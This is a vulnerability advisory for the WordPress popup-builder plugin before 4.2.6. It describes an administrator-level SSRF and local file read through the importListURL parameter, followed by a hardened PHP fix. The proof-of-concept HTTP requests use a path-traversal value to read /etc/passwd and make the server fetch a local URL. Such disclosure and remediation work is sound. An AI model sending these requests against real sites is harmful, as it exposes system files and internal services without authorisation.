WordPress Plugin Vulnerabilities

popup-builder < 4.2.6 - Admin+ SSRF & File Read

Description

The plugin does not validate the importListURL parameter before making a request to it, which could allow users with the administrator role to perform SSRF and local file read attacks in Multisite WordPress configurations.

Proof of Concept

1. Create a Multisite WordPress setup, e.g. using Docker containers, and set up a second site with a separate administrator (without super-admin/network-admin rights).
2. Install the popup-builder plugin and activate it for the network.
3. Log in as that new administrator to the separate site (here: "site2" at "/site2/").
4. In the admin dashboard, navigate to Popup Builder -> Add New and add a new dummy subscription.
5. Navigate to All Subscribers -> Import. Choose the dummy subscription and enter any text in the file field.
6. Intercept the HTTP request issued by submitting the import form, which will include a valid nonce.
7. Change the parameter "importListURL" to "../../../../../../../../../../../../../../../../etc/passwd":

POST /site2/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 156
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: [cookie]
Connection: close

action=sgpb_import_subscribers&nonce=7ab37e2ddd&popupSubscriptionList=8&importListURL=../../../../../../../../../../../../../../../../etc/passwd&beforeSend=

This will output the first line of /etc/passwd in the response:

<div class="subFormItem__title">
	root:x:0:0:root:/root:/bin/bash
</div>

8. Alternatively, "importListURL" can be set to any URL, allowing for SSRF, e.g. "importListURL=http://localhost:1337/hacked.txt" with a "python -m http.server 1337" serving a "hacked.txt":

POST /site2/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 130
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: [Cookies]
Connection: close

action=sgpb_import_subscribers&nonce=7ab37e2ddd&popupSubscriptionList=8&importListURL=http://localhost:1337/hacked.txt&beforeSend=

Response:

<div class="subFormItem__title">
	Hacked
</div>

Output from python:

root@6bd896f15815:/var/www/html# python3 -m http.server --directory /tmp 1337
Serving HTTP on 0.0.0.0 port 1337 (http://0.0.0.0:1337/) ...
127.0.0.1 - - [21/Nov/2023 15:05:01] "GET /hacked.txt HTTP/1.1" 200 -
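The root cause described above (a user-supplied value handed to a fetch without validation) and the fix for it, as an added PHP example. This is not the plugin's own code: the handler, the nonce action and the function names are hypothetical, and the "unsafe" version is a simplified pattern consistent with the behaviour shown in the two requests above, not the plugin's actual implementation. The hardened version uses only standard WordPress API functions.

```php
<?php
// Added example, not the plugin's code. Names prefixed "hypothetical_" are
// assumptions made for illustration.

// Unvalidated pattern: the value of importListURL goes straight to a fetch.
// A relative path such as ../../../../etc/passwd is read from disk (file read),
// and an http:// URL is fetched from inside the server (SSRF). The nonce check
// does not help because the caller is a legitimate site administrator.
function hypothetical_import_subscribers_unsafe() {
    check_ajax_referer( 'hypothetical_import_nonce', 'nonce' );
    $source = wp_unslash( $_POST['importListURL'] );
    $data   = file_get_contents( $source ); // accepts both local paths and URLs
    wp_send_json_success( array( 'firstLine' => strtok( $data, "\n" ) ) );
}

// Hardened version.
function hypothetical_import_subscribers_safe() {
    check_ajax_referer( 'hypothetical_import_nonce', 'nonce' );

    // Server-side fetches are a super-admin privilege on Multisite: site
    // administrators do not hold install_plugins there, so this check stops the
    // Admin+ scenario from the advisory while still working on single-site installs.
    if ( ! current_user_can( 'install_plugins' ) ) {
        wp_send_json_error( 'insufficient permissions', 403 );
    }

    $source = isset( $_POST['importListURL'] )
        ? sanitize_text_field( wp_unslash( $_POST['importListURL'] ) )
        : '';

    // wp_http_validate_url() accepts only absolute http(s) URLs and, by default,
    // rejects hosts that resolve to loopback or private ranges. A filesystem
    // path (with or without traversal) never passes, so the file-read vector
    // is closed here as well.
    $url = wp_http_validate_url( $source );
    if ( false === $url ) {
        wp_send_json_error( 'importListURL must be an external http(s) URL', 400 );
    }

    // wp_safe_remote_get() sets reject_unsafe_urls, so the same validation is
    // re-applied to the request and to any redirect target.
    $response = wp_safe_remote_get( $url, array( 'timeout' => 10, 'redirection' => 2 ) );
    if ( is_wp_error( $response ) || 200 !== wp_remote_retrieve_response_code( $response ) ) {
        wp_send_json_error( 'could not fetch import list', 502 );
    }

    // Parse the body as the expected format instead of echoing raw lines back,
    // which removes the response-reflection that made the PoC output visible.
    $body = wp_remote_retrieve_body( $response );
    $rows = array_map( 'str_getcsv', preg_split( '/\r\n|\r|\n/', trim( $body ) ) );
    wp_send_json_success( array( 'rows' => count( $rows ) ) );
}

add_action( 'wp_ajax_hypothetical_import_subscribers', 'hypothetical_import_subscribers_safe' );
```

Two caveats for whoever applies this pattern: wp_http_validate_url() resolves the host name at validation time, so a name that later resolves to an internal address (DNS rebinding) is not covered by it alone, and sites that legitimately need to import from internal hosts will have to allow them explicitly through the http_request_host_is_external filter rather than by removing the check.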

Affects Plugins

Fixed in 4.2.6

Miscellaneous

Original Researcher
Sebastian Neef
Submitter
Sebastian Neef
Verified
Yes

Timeline

Publicly Published
2024-01-17
Added
2024-01-17
Last Updated
2024-01-17